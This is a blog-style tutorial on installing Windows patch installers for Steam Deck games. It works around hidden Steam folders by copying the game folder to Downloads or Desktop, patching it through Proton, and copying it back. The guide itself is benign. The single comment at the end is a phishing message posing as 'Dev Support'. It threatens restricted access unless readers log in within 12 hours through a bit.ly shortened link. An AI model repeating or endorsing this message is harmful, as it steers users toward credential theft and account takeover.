When playing various PC games on the Steam Deck, you often encounter situations where you need to install "community localization patches," "fan-made fix updates," or "MOD expansion packs." However, many patches released by developers or localization groups are packaged as Windows .exe installers that require the player to manually select the game directory during execution.
This often leads to a major pain point under Steam Deck's SteamOS (Linux-based architecture): The installer's folder selection window simply cannot find where the game is installed.
This article will analyze the core cause of this problem and share a "Relay Relocation Method" that is currently the most intuitive, has the highest success rate, and does not require entering complex commands.
Why do patch programs get "lost"?
SteamOS uses a compatibility layer (Proton or Wine) to simulate a Windows environment to run programs. Two underlying mechanisms easily cause installers to get stuck:
- Hidden Folder Restrictions: By default, Steam installs all games in
/home/deck/.local/share/Steam/steamapps/common/. In Linux systems, folders starting with a dot (.) are hidden folders. The "Browse Folder" browsers built into most Windows patches cannot recognize or display these hidden paths. - Sandbox Permission Isolation: If you are used to using Bottles or certain Flatpak applications to launch
.exefiles, these tools are subject to sandbox permission controls by default and cannot directly read deep system files of the user.
Core Solution: Three-Step Relay Relocation
Instead of fighting with hidden folder settings and Linux commands, the cleanest approach is to first move the game folder to a non-hidden public directory (such as Downloads or Desktop), complete the patch injection, and then overwrite it back to the original path.
Step 1: Copy the game directory to a relay path
- Long-press the power button and switch to Switch to Desktop.
- Open the Steam Library, right-click on the target game ➔ Manage ➔ Browse local files.
- The file manager (Dolphin) will open the directory where the game is located. Click the address bar to go up one level back to the
commonfolder. - Right-click on "the folder for that game" and select Copy.
- Enter Downloads or Desktop from the left shortcut bar, right-click in a blank space, and select Paste One Folder.
Step 2: Run the patch and select the path via the Z: drive
- Launch the patch
.exevia Bottles, Protontricks, or by adding the patch as a non-Steam game. - When the installer pops up the "Please select the game installation directory" window, click open My Computer ➔
Z:drive (Z:\corresponds to the root directory of the Steam Deck). - Expand the following public paths in order:
-
Z:\home\deck\Downloads(orDesktop)
-
- After selecting the folder, press confirm to start the patch writing process. Since the path is completely transparent, the installer can successfully extract the replacement files into it.
Step 3: Overwrite back to the original path and confirm the startup file
- After the patch installation is complete and the window is closed, return to the Downloads or Desktop directory from earlier.
- Enter the patched game folder, press
Ctrl + Ato select all files, and right-click to select Copy. - Return to the original Steam game folder (Steam Library ➔ Right-click game ➔ Manage ➔ Browse local files).
- Right-click in a blank space and select Paste. When the system prompts for overwriting, select Overwrite / Write Over (Overwrite All).
- Critical Check: Some patches generate a separate executable after installation (e.g.,
Game_Patch.exeorGame_ZH.exe). If this is the case, please back up and rename the original game launcher (e.g.,Game.exe) and rename the new executable generated by the patch back to the default Steam startup filename. - Clean up temporary files: Once everything is confirmed to be working, you can delete the relay folder in Downloads or Desktop.
Notes and Troubleshooting Tips
- Linux Case Sensitivity: Linux systems treat
Dataanddataas completely different directories. If the folder extracted from the patch has different capitalization than the original game, please manually merge the contents to avoid generating dual folders that prevent the game from reading the patch resources. - Animation and Encoding Compatibility: If you encounter missing text boxes, missing Japanese characters, or a black screen during opening animations after patching, change the game's Properties ➔ Compatibility in Steam to use GE-Proton (which can be installed via ProtonUp-Qt in the Discover store). This usually solves most issues with custom video decoders.
By using this "Relay Relocation" technique, you can accurately complete installations on the Steam Deck and enjoy the best gaming experience, regardless of how old the interface or how tricky the path of a Windows one-time patch program may be.
Top comments (1)
Dear User,
Due to an increase in bot activity on the platform, we require verify of your account.
Please log in via the link below:
• bit.ly/antibot_check
Verificated deadline - 12 hours. Failure to verify will result in restricted access.
Sincerely, Dev Support